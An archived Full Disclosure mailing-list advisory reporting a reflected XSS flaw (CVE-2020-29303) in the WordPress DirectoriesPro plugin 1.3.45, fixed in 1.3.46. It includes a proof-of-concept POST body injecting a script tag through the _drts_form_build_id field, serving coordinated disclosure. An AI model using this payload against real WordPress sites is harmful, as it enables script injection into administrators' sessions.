<!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="13"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#14">By Date</a>
<a href="15"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="13"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#14">By Thread</a>
<a href="15"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>
</div>
<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">Reflected XSS in WordPress - DirectoriesPro 1.3.45 plugin disclosure</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->
<em>From</em>: Jack Misiura via Fulldisclosure <fulldisclosure () seclists org>
<em>Date</em>: Thu, 10 Dec 2020 01:18:13 +0000
<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">Title: Reflected XSS
Product: WordPress DirectoriesPro Plugin by SabaiApps
Vendor Homepage: <a rel="nofollow" href="https://directoriespro.com/">https://directoriespro.com/</a>
Vulnerable Version: 1.3.45
Fixed Version: 1.3.46
CVE Number: CVE-2020-29303
Author: Jack Misiura from The Missing Link
Website: <a rel="nofollow" href="https://www.themissinglink.com.au">https://www.themissinglink.com.au</a>
Timeline:
2020-11-26 Disclosed to Vendor
2020-11-27 Vendor releases patched version
2020-12-07 Fix confirmed
2020-12-10 Publication
1. Vulnerability Description
The WordPress DirectoriesPro plugin did not sanitise the _drts_form_build_id in a POST request, allowing for HTML or
JavaScript injection.
2. PoC
On a WordPress installation with a vulnerable DirectoriesPro plugin, issue the following POST request while logged in
as Administrator to, for example, <a rel="nofollow" href="http://example.com/wp-admin/admin.php?page=drts/directories">http://example.com/wp-admin/admin.php?page=drts/directories</a>
<<a rel="nofollow" href="http://example.com/wp-admin/admin.php?page=drts/directories&q=%2Fdirectories%2Fstaff%2Fexport%2F">http://example.com/wp-admin/admin.php?page=drts/directories&q=%2Fdirectories%2Fstaff%2Fexport%2F</a>>
&q=%2Fdirectories%2Fstaff%2Fexport%2F. Please note, the _t_ parameter is set to an invalid or non-existent CSRF token.
filename=staff_txt&pretty_print=1&_drts_form_build_id=123"><script>alert('Reflected%20XSS');</script>%20onmouseover="&_t_=1234567&_drts_form_submit%5B0%5D=0&_ajax_=%23drts-modal
3. Solution
The vendor provides an updated version (1.3.46) which should be installed immediately.
4. Advisory URL
<a rel="nofollow" href="https://www.themissinglink.com.au/security-advisories">https://www.themissinglink.com.au/security-advisories</a>
Jack Misiura
Application Security Consultant
a
9‑11 Dickson Avenue
Artarmon
NSW
2064
p
1300 865 865
os
+61 2 8436 8585
w
<<a rel="nofollow" href="https://www.themissinglink.com.au/">https://www.themissinglink.com.au/</a>> themissinglink.com.au
<<a rel="nofollow" href="https://www.linkedin.com/company/the-missing-link-pty-ltd/">https://www.linkedin.com/company/the-missing-link-pty-ltd/</a>>
<<a rel="nofollow" href="https://www.facebook.com/The-Missing-Link-268395013346228/?ref=bookmarks">https://www.facebook.com/The-Missing-Link-268395013346228/?ref=bookmarks</a>>
<<a rel="nofollow" href="https://twitter.com/TML_au">https://twitter.com/TML_au</a>>
<<a rel="nofollow" href="https://www.youtube.com/channel/UC2kd4mDmBs3SjW4lX3fFHnQ">https://www.youtube.com/channel/UC2kd4mDmBs3SjW4lX3fFHnQ</a>>
<<a rel="nofollow" href="https://www.instagram.com/the_missing_link_it/">https://www.instagram.com/the_missing_link_it/</a>>
<<a rel="nofollow" href="https://forms.office.com/Pages/ResponsePage.aspx?id=XZw2opTdq0iPe7AFmjygSPnqgoo11WREpgCEhJxsz3FUMUxTOUREUVRDTzBNQ0pKTkFaS1lETEFaSi4u">https://forms.office.com/Pages/ResponsePage.aspx?id=XZw2opTdq0iPe7AFmjygSPnqgoo11WREpgCEhJxsz3FUMUxTOUREUVRDTzBNQ0pKTkFaS1lETEFaSi4u</a>>
CAUTION - This message may contain privileged and confidential information intended only for the use of the addressee
named above. If you are not the intended recipient of this message you are hereby notified that any use, dissemination,
distribution or reproduction of this message is prohibited. If you have received this message in error please notify
The Missing Link immediately. Any views expressed in this message are those of the individual sender and may not
necessarily reflect the views of The Missing Link.
</pre><p><a href="att-14/image001.png"><img src="att-14/image001.png"></a></p>
<p><a href="att-14/image002.png"><img src="att-14/image002.png"></a></p>
<p><a href="att-14/image003.png"><img src="att-14/image003.png"></a></p>
<p><a href="att-14/image004.png"><img src="att-14/image004.png"></a></p>
<p><a href="att-14/image005.png"><img src="att-14/image005.png"></a></p>
<p><a href="att-14/image006.png"><img src="att-14/image006.png"></a></p>
<p><a href="att-14/image007.png"><img src="att-14/image007.png"></a></p>
<p><strong>Attachment:
<a href="att-14/smime_p7s.bin"><tt>smime.p7s</tt></a></strong>
<em>Description:</em> </p>
<pre style="margin: 0em;">
_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives & RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="13"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#14">By Date</a>
<a href="15"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="13"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#14">By Thread</a>
<a href="15"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>Reflected XSS in WordPress - DirectoriesPro 1.3.45 plugin disclosure</strong> <em>Jack Misiura via Fulldisclosure (Dec 11)</em>
</li></ul>
<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>